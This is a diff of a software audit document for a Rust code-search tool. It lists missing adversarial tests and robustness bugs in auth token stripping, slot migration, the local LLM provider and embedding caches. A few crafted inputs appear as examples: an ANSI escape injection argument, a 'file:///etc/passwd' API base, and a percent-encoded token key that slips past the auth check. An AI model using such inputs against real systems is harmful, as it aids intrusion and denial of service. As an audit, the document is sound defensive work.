-  - **A `[[note]]` with `mentions = [...]` containing 10,000+ strings**: each stored unchanged on `Note`. No per-note cap, no per-mentions cap. A malicious/mis-generated notes.toml can produce a Note with millions of mentions; `path_matches_mention` runs O(n_mentions × n_candidates) per query, DoS.
-  - **`text = ""`** (empty string) — not rejected. The trimmed text is empty; hash of empty bytes is deterministic but conflicts with all other empty notes.
-  - **`text = "\0\0\0"` (embedded NUL)** — accepted; when later written to a log line or daemon response, NUL may truncate downstream.
-  - **`sentiment = "0.5"` (string instead of float)** — returns `NoteError::Toml` with a parse error message that leaks the raw TOML in the daemon error envelope. Not tested for redaction.
-- **Suggested fix:** Add tests in `src/note.rs::tests`:
-  - `test_parse_notes_str_huge_mentions_array` — 100k mentions on one note; assert it is parsed OR pin a cap. Recommend: cap mentions at e.g. 100 per note with warn.
-  - `test_parse_notes_str_empty_text_rejected_or_kept` — pin behavior.
-  - `test_parse_notes_str_nul_in_text` — assert NUL passes through verbatim; log/emit contract separately.
-
-#### TC-ADV-1.29-6: HNSW `load_with_dim` — no test for id_map containing non-string JSON values
-- **Difficulty:** easy
-- **Location:** `src/hnsw/persist.rs:619-629` (id_map load). Existing tests at line 897+ cover oversized graph/data/id_map, missing checksum, dim mismatch, rebuild path.
-- **Description:** The id_map is deserialized as `Vec<String>` via `serde_json::from_reader`. Several corrupt-but-parseable shapes are untested:
-  - **id_map containing 10M zero-length strings** (each is `""` — 2 bytes in JSON). The file stays well under `MAX_ID_MAP_ENTRIES` (10M) cap but at 10M entries × avg 64 bytes overhead is 640 MB RAM. What happens when `id_map[5_000_000].clone()` hits a zero-string? That chunk never matches any chunk in SQLite — silent zero-result search, no warning.
-  - **id_map with duplicate strings**: two entries `["chunk1", "chunk1"]` pointing to the same chunk id. The HNSW graph has two distinct nodes at position 0 and 1. Search returns `chunk1` twice with potentially different scores — duplicate result, breaks RRF downstream.
-  - **id_map with strings containing embedded `\n` or `\0`**: survives deserialization, passes the `chunks_fts MATCH ?1` filter, but the `.hnsw.ids` JSON file round-trips — and the chunk_id becomes a lookup key in SQL. Injection surface if the id is later interpolated anywhere.
-- **Suggested fix:** Add to `src/hnsw/persist.rs::tests`:
-  - `test_load_rejects_duplicate_ids_in_id_map` — pin current behavior (duplicates accepted) or add a dedup check at load.
-  - `test_load_rejects_empty_string_ids_in_id_map` — assert warn or error.
-  - `test_load_rejects_nul_in_id_map_entry` — assert safety behavior.
-
-#### TC-ADV-1.29-7: `embedding_slice` does not validate that decoded floats are finite — no test for NaN bytes in DB
-- **Difficulty:** easy
-- **Location:** `src/store/helpers/embeddings.rs:32-42`. Existing tests cover only size mismatch (3 cases).
-- **Description:** `embedding_slice` validates byte length and casts to `&[f32]`. Any 4-byte sequence `0xFF 0xFF 0x7F 0x7F` is a valid NaN; `0x7F 0x80 0x00 0x00` is +Inf. If the SQLite embedding BLOB column is bit-rotted or written by a buggy embedder (see TC-ADV-1.29-2), `embedding_slice` silently returns NaN/Inf which flow directly into `score_candidate` (brute force path in `search_filtered`). `score_candidate` does have a NaN guard (test `score_candidate_nan_embedding_filtered` exists) — but the dot-product intermediates that feed it are computed every call. A whole-corpus NaN corruption from a single bad reindex produces zero results with no structured error.
-- **Suggested fix:** Add to `src/store/helpers/embeddings.rs::tests`:
-  - `test_embedding_slice_returns_nan_bytes_verbatim` — pin current passthrough behavior (the test author's choice: change contract or document it).
-  - `test_bytes_to_embedding_nan_input` — same shape.
-  - Recommend adding a `#[cfg(debug_assertions)]` sanity check that logs a warn-once if any decoded float is non-finite, since this is impossible under normal operation (the embedder always normalizes to unit length).
-
-#### TC-ADV-1.29-8: `dispatch_line` shell_words tokenizer — no test for arg with ANSI escape sequences
-- **Difficulty:** easy
-- **Location:** `src/cli/batch/mod.rs:557-621`. Existing tests at line 2129+ cover NUL bytes in double-quoted args (P2 #51) and unbalanced quotes.
-- **Description:** `dispatch_line` logs `args_len` (P3 #138 dropped the args_preview) but the full line passed downstream to `BatchInput::try_parse_from` is still parsed by clap with `args_preview`-style untrimmed tokens. If an agent sends `search "\x1b[2J\x1b[Hmalicious"` (ANSI clear screen + home cursor), the resulting error message flows to the client's terminal via tracing. Tested: NUL bytes (rejected). Untested: other C0 control chars (`\x07` BEL, `\x1b` ESC, `\x08` BS), `\r` as line separator within an arg, `\t` TAB inside a token.
-- **Suggested fix:** Add to `src/cli/batch/mod.rs::tests`:
-  - `test_dispatch_line_rejects_ansi_escape_in_arg` — pin either pass-through or rejection.
-  - `test_dispatch_line_rejects_bel_in_arg` — same.
-  - `test_dispatch_line_cr_in_arg_treated_as_arg_char_not_separator` — confirm single-line parsing still holds.
-
-#### TC-ADV-1.29-9: `SpladeEncoder::encode` raw-logits path — no test for Inf-valued logits input
-- **Difficulty:** easy
-- **Location:** `src/splade/mod.rs:540-572` (encode, raw-logits branch). Tests at `src/splade/mod.rs:874+`.
-- **Description:** Line 557: `pooled = logits.fold_axis(Axis(0), f32::NEG_INFINITY, |&a, &b| a.max(b))`. If `b` is +Inf, `a.max(+Inf) = +Inf`. Then line 564: `activated = (1.0 + val.max(0.0)).ln()` with `val = Inf` gives `activated = Inf`. Line 565: `Inf > self.threshold` → `true`, so the token is emitted with `Inf` weight. The resulting `SparseVector` then flows through `SpladeEncoder::search_with_filter`, which sums weighted dot products — Inf * anything = Inf, poisoning the entire score hash map. Silent corruption, no warning, no panic (the NaN branch actually filters via `> threshold == false`, but Inf passes the comparison).
-- **Suggested fix:** Add to `src/splade/mod.rs::tests`:
-  - `test_encode_rejects_inf_in_pooled_logits` (or sanitizes them) — pin whichever contract.
-  - `test_encode_rejects_nan_in_pooled_logits` — the NaN path is "silently dropped" today; pin that or fail loudly.
-  - Downstream: `test_splade_search_with_inf_weighted_sparse_vector` in `src/splade/index.rs`.
-
-#### TC-ADV-1.29-10: `parse_unified_diff` called on 50 MB diff — no DoS test
+#### TC-ADV-1.30-4: Non-blocking HNSW rebuild — no test for thread panic, dim drift, or store-open failure
 - **Difficulty:** medium
-- **Location:** `src/diff_parse.rs:33-108`, called from `src/cli/commands/graph/impact_diff.rs:39`, `src/review.rs:85`, `src/ci.rs:93`, `src/cli/batch/handlers/graph.rs:399`.
-- **Description:** Upstream `MAX_DIFF_SIZE = 50MB` (`src/cli/commands/mod.rs:512`) caps stdin, but `parse_unified_diff` accepts any `&str` and builds a `Vec<DiffHunk>` with one allocation per hunk header matched. A 50 MB diff with a hunk header on every line (CRLF-normalized doubles memory briefly: `input.replace("\r\n", "\n").replace('\r', "\n")`) — hundreds of thousands of hunks, each allocating a `PathBuf` via `PathBuf::from(file.as_str())` (line 99). No cap on `hunks.len()`. `map_hunks_to_functions` has its own cap via `CQS_IMPACT_MAX_CHANGED_FUNCTIONS` (default 500), but that applies after `parse_unified_diff` has already built and returned the huge Vec. No test exercises the 50MB boundary or the "one hunk per line" worst case.
-- **Suggested fix:** Add a test in `tests/diff_parse_test.rs`:
-  - `test_parse_unified_diff_large_input_bounded` — construct 10 MB of `@@ +1,1 @@\n` lines with a leading `+++ b/foo.rs\n`, parse, assert Vec length matches and that memory usage stays bounded (e.g., under 100 MB wall-clock). Or, if a hard cap is desired, add `MAX_HUNKS` and pin it.
-  - Currently `parse_unified_diff` also loses the performance feedback signal (no `tracing::info!` with hunk count after parse) so operators wouldn't see "10k hunks in one diff" in the journal.
+- **Location:** `src/cli/watch.rs:965-1042` (`spawn_hnsw_rebuild`), `:1058+` (`drain_pending_rebuild`). Existing tests at `:3979-4115` cover `delta` replay, dedup, error-clears-pending, in-flight stays-pending.
+- **Description:** The rebuild thread runs `cqs::Store::open_readonly_pooled`, then `build_hnsw_index_owned`, then `build_hnsw_base_index`. Several adversarial paths are not exercised:
+  - **Thread panic mid-build**: the closure at `:980-1030` is *not* wrapped in `std::panic::catch_unwind`. A panic inside `build_hnsw_index_owned` (e.g., from `unwrap` on a corrupt vector during `id_map.clone()`) unwinds the thread, which means the `let _ = tx.send(result)` at line 1029 *never runs* — the receive side hits `TryRecvError::Disconnected` on the next `drain_pending_rebuild` poll. That path *does* clear pending (line 1066-1068), so the daemon recovers. But the *delta* (chunks captured during the rebuild window) is **silently dropped** — those chunks are never inserted into any index until the next full rebuild trigger. No test covers this drop.
+  - **Store dim drift**: line 985-991 explicitly checks `store.dim() != expected_dim` and bails. No test exercises this — the test fixture at `:3979` builds `state` directly, not via `spawn_hnsw_rebuild`, so the dim-drift bail path has zero coverage. After #1105 (named slots), this is *the* defense against `cqs slot promote` flipping the active slot to a different-dim model mid-rebuild.
+  - **Store open failure**: line 984 `cqs::Store::open_readonly_pooled` can fail with `SQLITE_BUSY` (concurrent migration), `SQLITE_CANTOPEN` (slot dir gone — see TC-ADV-1.30-3), or schema mismatch. All collapse to `RebuildOutcome::Err`, which `drain_pending_rebuild` clears (line 1100+ in the `Err(_)` arm). Untested.
+  - **Spawn-failure path** (line 1031-1036): a `Builder::spawn` failure (resource exhaustion) returns a `PendingRebuild` whose `rx` is a *fresh, unsent channel* — `try_recv` returns `Empty` forever, NOT `Disconnected`. The pending state is leaked: the watch loop thinks a rebuild is in flight indefinitely and never spawns a follow-up. **This is a real bug, not just a coverage gap** — comment says "channel will hang up on first poll" but `tx` is dropped at end of `spawn_hnsw_rebuild`'s scope only because the closure was never moved into a thread. Actually re-reading: `tx` was moved into the closure that failed to spawn, so it's dropped, and `rx.try_recv()` would return `Disconnected`. OK so the leak is closed — but the test that pins this should exist.
+- **Suggested fix:** Add to `src/cli/watch.rs::tests` (alongside `drain_pending_rebuild_*`):
+  - `test_spawn_hnsw_rebuild_dim_mismatch_clears_pending` — set up a `Store` with `dim=768`, call `spawn_hnsw_rebuild(…, expected_dim=1024, …)`, then `drain_pending_rebuild`; assert pending is cleared and the watch state has no dangling channel.
+  - `test_spawn_hnsw_rebuild_thread_panic_drops_delta_loudly` — wrap the rebuild closure or use a temporary feature flag to inject a panic; assert the delta is *not* silently dropped (current behavior). The fix is to wrap the closure in `catch_unwind` and replay the delta into `state.hnsw_index` on panic.
+  - `test_spawn_hnsw_rebuild_store_open_fails_clears_pending` — point at a non-existent index path; assert `drain_pending_rebuild` clears pending after the receiver sees the error.
+  - `test_spawn_hnsw_rebuild_failure_to_spawn_disconnect_path` — synthesize spawn failure (rlimit on threads, or stub `Builder::spawn` via injection); assert a follow-up `drain_pending_rebuild` clears via `Disconnected`.
+
+#### TC-ADV-1.30-5: `serve` auth — `strip_token_param` does not handle case variants, percent-encoded `token`, or leading `?token=` after a `?`-less path
+- **Difficulty:** easy
+- **Location:** `src/serve/auth.rs:101-115` (`strip_token_param`). Existing tests at `:269-291`.
+- **Description:** Three cases not pinned:
+  - **Case mismatch**: `?Token=abc` (capital T) — `pair.starts_with("token=")` is false, kept in the redirect URL. Browsers preserve case; some CLIs lowercase. The token won't match `ct_eq` either (token is URL-safe base64, mixed case-sensitive), so this never authenticates — but the leftover `?Token=…` in the redirect URL leaks the token into the address bar, defeating the SEC-7 design goal.
+  - **Percent-encoded `token`**: `?%74oken=abc` (`%74` = `t`) — same issue, the percent-encoded prefix fails the literal `starts_with` check and the redirect carries the (still-bad) param through. RFC 3986 says `%74` and `t` are equivalent at the URI level; clients may normalize at random.
+  - **Empty value `?token=`**: not tested. `pair.strip_prefix("token=")` returns `Some("")`; `ct_eq("", expected)` is false, so it falls through to `Unauthorized`. But no test pins this — a future refactor could accept empty tokens.
+  - **Trailing `&` / double `&`**: `?token=abc&&depth=3` — `query.split('&')` produces an empty string between the `&&`. The empty pair fails `starts_with("token=")` and survives into the rejoined query. The redirect URL has `?depth=3` (since join uses `&`), but if the *only* other param were such an empty pair the redirect emits a stray empty query slot. Cosmetic but untested.
+  - The deeper concern: `check_request` at `:158-172` only matches *literal* `token=…` in the query string, by the same `starts_with` check. So a percent-encoded `token` query param is silently treated as no token — a user pasting a URL into a browser that just happens to percent-encode `t` (Safari does this in some flows for non-ASCII surrounding context) gets a 401 for what should be a valid token. Untested.
+- **Suggested fix:** In `src/serve/auth.rs::tests` (extend the existing `strip_token_param_*` set):
+  - `test_strip_token_param_case_insensitive` — pin behavior on `?Token=…` (ideally: also stripped, since the auth check should be case-insensitive on param name to match HTTP convention).
+  - `test_check_request_rejects_percent_encoded_token_key` — `%74oken=…` — assert 401 (current behavior) or fix to decode.
+  - `test_strip_token_param_handles_double_ampersand` — `?token=abc&&depth=3` — pin redirect output.
+  - Recommend a one-line fix: percent-decode the *key* using `percent_encoding::percent_decode_str` (already in the dep tree) before the prefix check, and lowercase the key for comparison. Token *value* stays exact-match for `ct_eq`.
+
+#### TC-ADV-1.30-6: `validate_slot_name` accepts names that the OS or shell will misinterpret
+- **Difficulty:** easy
+- **Location:** `src/slot/mod.rs:159-178`, `src/slot/mod.rs:661+` (existing tests).
+- **Description:** Pure `[a-z0-9_-]+` with max 32 chars seems safe, but two concrete cases bite:
+  - **Names starting with `-`**: `validate_slot_name("-foo")` returns `Ok(())`. When passed to `cqs index --slot -foo`, clap's positional/long-flag parser will treat `-foo` as a flag, not a value to `--slot`. The user gets a confusing clap error far from the slot module. Untested.
+  - **Names ending with `-`**: `"foo-"` passes. Cosmetically fine on Linux/macOS but `cqs slot remove foo-` — `cqs slot remove` accepts the name OK, but `fs::remove_dir_all(slot_dir(…, "foo-"))` then operates on `.cqs/slots/foo-/`. On Windows, trailing dashes in directory names are legal, no issue. The real problem: shell completion / `gh` URL passes / Slack mentions silently strip trailing dashes from many copy-paste paths.
+  - **Names that are integer-shaped**: `"42"` passes. Then `cqs slot create 42 --model bge-large` is fine, but a future consumer that does `--slot $(cat foo)` where `foo` contains numeric data is fine — yet some shell pipelines pass numeric strings through to flag parsers as positional args by accident. Documenting that integer-shaped names are valid is enough; no current bug, but pinning the contract is cheap.
+  - **Pure-underscore names**: `"_"`, `"__"`, `"_____"` all pass. `cqs slot create _` is legal. UI prints `*  _   chunks=0 …`. Cosmetic, untested. Pinning behavior with a test means future column-alignment / log-parsing changes don't silently break.
+- **Suggested fix:** Add to `src/slot/mod.rs::tests`:
+  - `test_validate_rejects_leading_dash` — `validate_slot_name("-foo")` should error (because of clap collision), or document and pin if intentionally accepted. Recommend rejecting: a name starting with `-` cannot be passed as a `--slot` argument value without `--slot=-foo`, which most users won't know.
+  - `test_validate_rejects_trailing_dash` — pin behavior; recommend rejecting for consistency.
+  - `test_validate_accepts_pure_underscore_or_underscore_only` — pin current behavior so a future "must contain alphanumeric" tightening surfaces as a test break, not silent UX change.
+
+#### TC-ADV-1.30-7: `slot::migrate_legacy_index_to_default_slot` rollback path is untested
+- **Difficulty:** medium
+- **Location:** `src/slot/mod.rs:511-593` (migration), specifically the rollback loop at `:561-582`. No test for partial-failure rollback in `src/slot/mod.rs::tests` (`:850+` covers happy path + idempotency only).
+- **Description:** The migration moves N files (typically `index.db` + `index.db-wal` + `index.db-shm` + 4 HNSW files + SPLADE = 8 candidates) from `.cqs/` to `.cqs/slots/default/`. If `move_file` fails on file K (cross-device, permission denied, EBUSY on Windows because `index.db-wal` is still open by a concurrent reader), the rollback loop at line 562-571 reverses the moves of files 1..K-1. Failure modes:
+  - **Rollback itself fails**: line 564-569 logs but does not abort. After a failed rollback, files 1..K-1 are in `slots/default/`, file K is in the original `.cqs/` directory, and the active_slot pointer is **never written** (line 585 only runs on success). The next migration call hits the `slots_dir.exists()` check at line 523 and returns `Ok(false)` — *the project is now permanently broken* with files split across two locations. Untested.
+  - **`fs::remove_dir(&dest)` at line 573 fails** because `slots/default/` contains rolled-back files that haven't been moved out. The cleanup is skipped silently (`let _ =`) so the next run sees `slots/` exist and does nothing. Same broken-project state. Untested.
+  - **EBUSY on Windows for `index.db-wal`** specifically: this is the realistic trigger. A daemon running the watch loop holds the WAL open. A user runs `cqs index` from another shell, which does `Store::open` → triggers migration. WAL is locked. Migration step 2 (`-wal`) fails. Step 1 (`index.db`) succeeded — already moved into `slots/default/`. Rollback moves it back. Cleanup tries to `remove_dir(&dest)`. Now there's only one outcome: the project is fine. *Unless* the rollback `move_file(slots/default/index.db, .cqs/index.db)` itself fails (e.g., something raced to create a file at the target path) — then we have split state, no rollback, no test.
+- **Suggested fix:** Add to `src/slot/mod.rs::tests`:
+  - `test_migrate_rollback_on_second_file_failure` — plant `index.db` and `index.db-wal`, make `index.db-wal` fail to move (e.g., open it with an exclusive handle on Linux via `flock`, or remove read perms on the parent dir mid-test). Assert the rollback restores `index.db` to `.cqs/`, `slots/` is fully cleaned up, and the next migration call still works.
+  - `test_migrate_rollback_failure_leaves_loud_signal` — make rollback itself fail (chmod the source dir read-only after the first move). Assert the migration returns `Err(SlotError::Migration(…))` AND the user-visible state contains a *single* known signal (not silent split state). Recommend writing a `.cqs/migration_failed` marker file the daemon checks at startup, or refuse to start when `slots/` and `.cqs/index.db` both exist.
+
+#### TC-ADV-1.30-8: `LocalProvider` accepts non-HTTP `api_base` URLs and unbalanced `concurrency` configurations
+- **Difficulty:** easy
+- **Location:** `src/llm/local.rs:88-121` (`LocalProvider::new`), `:128-312` (`submit_via_chat_completions`), `:153` (channel sized at `concurrency.max(8) * 2`).
+- **Description:** Three under-tested edge cases on the new (#1101) provider:
+  - **Non-HTTP scheme**: `api_base = "file:///etc/passwd"` or `"gopher://example/"`. `Client::post(&url)` accepts the URL; `reqwest` errors at request time with a generic "URL scheme is not allowed" but the error is downgraded to `LlmError::Http` via `?` and retried 4× (each retry sleeping 500ms→4s). 7.5s wasted per item × N items, no specific signal that the user typo'd `file://` for `http://`. Untested.
+  - **`api_base` with trailing slash**: `"http://x/v1/"` → `format!("{}/chat/completions", self.api_base)` → `"http://x/v1//chat/completions"`. Most servers handle the doubled slash; some (strict nginx configs, some llama.cpp builds) 404. The user's mock at `make_config(&format!("{}/v1", server.base_url()), …)` always uses no trailing slash. No regression test.
+  - **`api_base` without `/v1`**: `"http://x"` → `"http://x/chat/completions"`. Some servers expect it (vLLM defaults to `/v1`); others reject. The doc at line 80-82 says "any server that speaks `/v1/chat/completions`" but the code does not enforce or normalize. No test pins the contract.
+  - **`concurrency=64, items=1`**: line 153 sizes the bounded channel at `concurrency.max(8) * 2 = 128` for a single item. 64 worker threads spin up, 63 immediately exit on closed-channel after the single item is consumed. Wasteful but harmless — until you note it does this for *every* `submit_*` call inside the same daemon, and worker-thread allocation under heavy churn is non-trivial on glibc. No test verifies that small batches don't spawn full-concurrency thread pools.
+- **Suggested fix:** Add to `src/llm/local.rs::tests`:
+  - `test_non_http_api_base_fails_fast` — `make_config("file:///tmp/foo", …)`, `submit_batch_prebuilt(&items, …)`. Assert error returns within ~100ms (no 7.5s × N retry stall). Recommend adding a one-line URL scheme check in `LocalProvider::new`: bail if `Url::parse(&api_base).scheme() != "http" && != "https"`.
+  - `test_api_base_with_trailing_slash_works` — pin behavior so the doubled-slash case either succeeds (current httpmock probably accepts) or normalizes.
+  - `test_concurrency_clamped_to_item_count_when_smaller` — recommend `let workers = self.concurrency.min(items.len()).max(1);` at line 166. Test that for `items.len()=1`, only 1 worker thread is spawned (verify via thread name enumeration or a counter in a custom worker-spawn hook).
+
+#### TC-ADV-1.30-9: Embedder `provider::ort_runtime_search_dir` and `find_ld_library_dir` — no test for malformed `/proc/self/cmdline` or pathological `LD_LIBRARY_PATH`
+- **Difficulty:** easy
+- **Location:** `src/embedder/provider.rs:67-83` (`ort_runtime_search_dir`), `:115-123` (`find_ld_library_dir`), `:34-62` (`ensure_ort_provider_libs`). No `#[test]` block in this file at all — provider detection paths are exercised only end-to-end via `Embedder::new`.
+- **Description:** This file moved out of `embedder/mod.rs` in #1120 (Phase A) and gained the explicit symlink-and-search logic. It now reads `/proc/self/cmdline`, parses up to the first NUL, decodes UTF-8, and joins against CWD. Untested adversarial inputs:
+  - **`/proc/self/cmdline` empty / single NUL**: `cmdline.iter().position(|&b| b == 0)` returns `None` (if no NUL) or `Some(0)` (if first byte is NUL). For `Some(0)`: `argv0 = ""`, `argv0.starts_with('/')` is false, falls through to `current_dir().ok()?.join("")` → `current_dir`. Then `abs_path.parent()` returns `Some(current_dir.parent())`. The symlink directory becomes the *parent* of CWD. If CWD is `/home/user/proj/.cqs`, ORT search dir becomes `/home/user/proj/`. Probably benign (no provider .so files there). But if CWD is `/`, parent is `None` and `ensure_ort_provider_libs` silently does nothing — provider activation fails on the first call, caller falls back to CPU with no diagnostic. Untested.
+  - **Non-UTF8 argv[0]**: `std::str::from_utf8(&cmdline[..argv0_end]).ok()?` returns `None`. Function returns `None`. Same silent-CPU-fallback. Untested. While Linux argv[0] *should* be UTF-8, container runtimes occasionally inject non-UTF-8 bytes via `exec` for sandboxing / launchers.
+  - **`LD_LIBRARY_PATH` with empty entries**: `"::/foo:"` — `ld_path.split(':')` produces `["", "", "/foo", ""]`. Filter `!p.is_empty()` rejects all empties. Then `Path::new("/foo").is_dir()` decides. Untested for the `LD_LIBRARY_PATH=":"` corner case.
+  - **`LD_LIBRARY_PATH` containing the ORT cache itself** (`:ort_lib_dir`): the filter `!ort_cache_str.starts_with(p)` excludes *prefixes* of the ORT cache. If `ort_lib_dir = /home/u/.cache/ort.pyke.io/dfbin/x86_64-…/v1.x` and `LD_LIBRARY_PATH = /home/u/.cache`, the filter drops `/home/u/.cache` because `ort_cache_str` does start with it. Probably correct intent. But `LD_LIBRARY_PATH = /home/u/.cache/ort.pyke.io/dfbin/x86_64-unknown-linux-gnu/v0.x` (sibling cache version) is *not* a prefix of the active ORT lib dir, so it passes the filter and gets symlinks pointed *into* a stale ORT version's cache. Symlink overwrite of the user's other ORT install. Untested.
+- **Suggested fix:** Create `src/embedder/provider.rs::tests` (currently empty):
+  - `test_ort_runtime_search_dir_handles_empty_cmdline` — write a file at a temp path that begins with NUL; inject via test-only env var override or test-only feature flag. Assert returns `None` or a documented sentinel.
+  - `test_find_ld_library_dir_skips_empty_entries` — `LD_LIBRARY_PATH=":/tmp:"`, assert it picks `/tmp` and not `""`.
+  - `test_find_ld_library_dir_does_not_pick_sibling_ort_version_dir` — set up two cache dirs `…/v0.x` and `…/v1.x`, point `LD_LIBRARY_PATH` at `…/v0.x`, assert the symlink target is *not* `…/v0.x` (since that would corrupt the older cache). Recommend changing the prefix-check to a path-containment check via `Path::ancestors()`.
+
+#### TC-ADV-1.30-10: `cache::EmbeddingCache::insert_many` — `blake3_hex_or_passthrough` accepts non-hex content_hash bytes that look like hex
+- **Difficulty:** easy
+- **Location:** `src/cache.rs:709-721` (`blake3_hex_or_passthrough`), `:674-703` (`insert_many`). No test for the passthrough/encode branch boundaries.
+- **Description:** The function checks: if the bytes are valid UTF-8, length 64, and all ASCII hex digits → pass through; otherwise hex-encode each byte. Edge cases not tested:
+  - **64-byte UTF-8 with NUL bytes that happen to be in ASCII hex range**: NUL (0x00) is not in `0..='9' | 'a'..='f' | 'A'..='F'`, so the all-hex check fails and we fall through to encode. Good. But not tested.
+  - **64-byte UTF-8 that is all hex but uppercase**: `"ABCDEF…"` — `b.is_ascii_hexdigit()` accepts uppercase. So the cache stores uppercase hex for some entries and lowercase (the encoded path) for others. **Two writes for the same content_hash with different case produce two different cache rows.** PRIMARY KEY enforces uniqueness at the row level, but `(content_hash, model_fingerprint)` rows differ by case — so a chunk hashed once via passthrough (uppercase) and once via encode (lowercase) duplicates and both linger. Untested.
+  - **Non-64-byte hex strings**: `"abc"` (3 bytes UTF-8, all hex). Length check fails (3 != 64). Falls into encode → `"616263"` is stored. Each call with the same input is deterministic, but a caller passing a 32-char hex string gets a 64-char hex of the *bytes of that hex string*, not its decoded value. Surprising. Untested.
+  - The deeper issue: this function exists because `Chunk::content_hash` is *already* a hex string (lowercase, 64 chars), and the cache schema declares the column as `TEXT`. The passthrough is a fast path. Anything that doesn't fit the fast-path contract collides into a parallel hex encoding. Two different inputs can produce the same output: `b"\xab\xcd…"` (64 bytes) → hex-encode → 128 ascii chars; vs the literal string `"abcd…"` (64 chars, valid hex) → passthrough → 64 chars. These don't collide at length 64 vs 128, but they do at any matching length. *Specifically*: passing a 64-byte raw input where every byte happens to be `0x30` (ASCII '0') — that's UTF-8, hex-only, 64 chars long → passthrough as `"00…0"`. Vs another caller passing the literal 32-byte hex string `"00000000000000000000000000000000"` (32 chars, hex) → fails length check → encode → `"3030…30"` (64 chars). Different outputs. OK no collision. But an attacker controlling content_hash could craft inputs that hit the passthrough boundary intentionally; a more conservative fix is to *always* hex-encode and never trust passthrough.
+- **Suggested fix:** Add to `src/cache.rs::tests`:
+  - `test_blake3_hex_or_passthrough_uppercase_hex_passthrough` — pin: uppercase 64-char hex passes through unchanged. If we want lowercase invariant, normalize.
+  - `test_blake3_hex_or_passthrough_short_hex_string_gets_encoded` — pin: 32-char hex string is encoded, not passed through (the surprising case).
+  - `test_insert_many_does_not_dup_when_caller_alternates_passthrough_and_encode` — write the same logical chunk twice, once with hex string bytes and once with raw blake3 bytes; assert exactly one row in the DB after both inserts. This currently fails. Recommend: always normalize via blake3 hash of input bytes if length is not exactly 64 lowercase hex; or kill the passthrough fast path entirely (cost: one allocation per write — negligible).
 
 ## Summary
 
-10 findings filed. Highest-impact gaps are (1) the `normalize_l2` NaN/Inf passthrough into disk cache and downstream scoring, (2) zero adversarial tests on the daemon socket handler (a production hot path handling untrusted JSON), and (3) the SPLADE raw-logits Inf propagation into sparse-vector score fusion. The diff parser has good coverage but misses some edge shapes that affect downstream review/impact commands.
+10 findings. Highest-impact gaps cluster around v1.30.0's *new* surfaces:
+1. **#1101 LocalProvider** — unbounded body reads (TC-ADV-1.30-1, TC-ADV-1.30-8) DoS the daemon on a single hostile or panicked LLM endpoint. Trivial reqwest config fix.
+2. **#1105 Slots+Cache** — TOCTOU in concurrent slot ops (TC-ADV-1.30-3), untested rollback in legacy migration (TC-ADV-1.30-7), and *cross-slot* cache poisoning via NaN/Inf passthrough (TC-ADV-1.30-2) which #1105 made worse by extending the cache lifetime.
+3. **#1113 Background HNSW rebuild** — silent delta loss on thread panic (TC-ADV-1.30-4) is a real bug masked by an absent `catch_unwind`, plus dim-drift bail untested under concurrent slot promote.
+4. **#1118 Serve auth** (TC-ADV-1.30-5) — case-sensitivity and percent-encoding gaps in `strip_token_param` cause real SEC-7 leakage (token survives in URL bar after redirect).
+5. **#1120 Provider feature split** (TC-ADV-1.30-9) — silently falls back to CPU on malformed `/proc/self/cmdline` or pathological LD_LIBRARY_PATH; symlink target picking can corrupt sibling ORT cache versions.
 
----
+Lowest-priority but cheap to add: slot-name validation edges (TC-ADV-1.30-6), cache passthrough/encode duality (TC-ADV-1.30-10).
 
-## Robustness
 
-#### RB-1: `timeout_minutes * 60` unchecked multiplication on env-var input
+## Robustness — v1.30.0
+
+Note: prior round (v1.29.0) findings RB-1..RB-10 were filed in `docs/audit-triage-v1.30.0.md` as RB-V1.29-{1..10} and are not repeated here. The findings below are scoped to code added/changed in v1.30.0 (#1090, #1096, #1097, #1101, #1105, #1110, #1117, #1118, #1119, #1120). Read each cited line; many of the surface-level `unwrap()`s in v1.30.0 are guarded by an upstream `Some/Ok` check or live in `#[cfg(test)]`.
+
+#### RB-V1.30-1: Local LLM provider buffers entire HTTP response without size cap
 - **Difficulty:** easy
-- **Location:** `src/cli/batch/mod.rs:343`, `src/cli/batch/mod.rs:378`
-- **Description:** `let timeout = std::time::Duration::from_secs(timeout_minutes * 60);` — `timeout_minutes` is parsed directly from `CQS_BATCH_IDLE_MINUTES` / `CQS_BATCH_DATA_IDLE_MINUTES` via `.parse::<u64>().ok()`. A caller who sets `CQS_BATCH_IDLE_MINUTES=999999999999999999` lands in `u64` overflow (~307M year bound), silently wrapping to a small timeout value and evicting sessions on the very next tick — the opposite of what the user asked for. Debug builds panic, release silently wraps.
-- **Suggested fix:** `Duration::from_secs(timeout_minutes.saturating_mul(60))` at both sites. Alternatively clamp `timeout_minutes` to a sane ceiling (e.g. `365 * 24 * 60`) in `idle_timeout_minutes()` / `data_cache_idle_timeout_minutes()`.
+- **Location:** `src/llm/local.rs:97-100, 474-487, 492-499`
+- **Description:** `LocalProvider::new` builds a `reqwest::blocking::Client` with only a request timeout — no body cap, and `parse_choices_content` calls `resp.json()` which buffers the entire body before deserializing. A misbehaving (or malicious) local LLM server — particularly one a user pointed `CQS_LLM_API_BASE` at without auditing — can return a multi-GB JSON blob and OOM the cqs process during a `summarize` / `chat` batch. Same risk in `body_preview` via `resp.text().unwrap_or_default()` on the 4xx error path. The retry loop (`MAX_ATTEMPTS = 4`, `RETRY_BACKOFFS_MS` up to 4 s) means each oversize response gets up to four buffering attempts before the item is skipped, multiplying the wasted memory + wall time per item across `local_concurrency()` ≤ 64 worker threads.
+- **Suggested fix:** Pre-cap with a streamed read. Replace `resp.json()` with `resp.bytes()` after `Content-Length` inspection, or use a `take(N)` adaptor on the body — pick a 4 MiB cap on summary responses (a 50-token summary is a few hundred bytes; 4 MiB is ~1000× headroom). Apply the same cap to `body_preview` (replace `resp.text()` with a bounded read of ~2 KiB). New env var `CQS_LOCAL_LLM_MAX_BODY_BYTES` if a user wants to opt out.
 
-#### RB-2: `umap.rs` narrowing casts on row count / dim / id len without validation
+#### RB-V1.30-2: Slot pointer files (`active_slot`, `slot.toml`) read with unbounded `read_to_string`
 - **Difficulty:** easy
-- **Location:** `src/cli/commands/index/umap.rs:104-106,116`
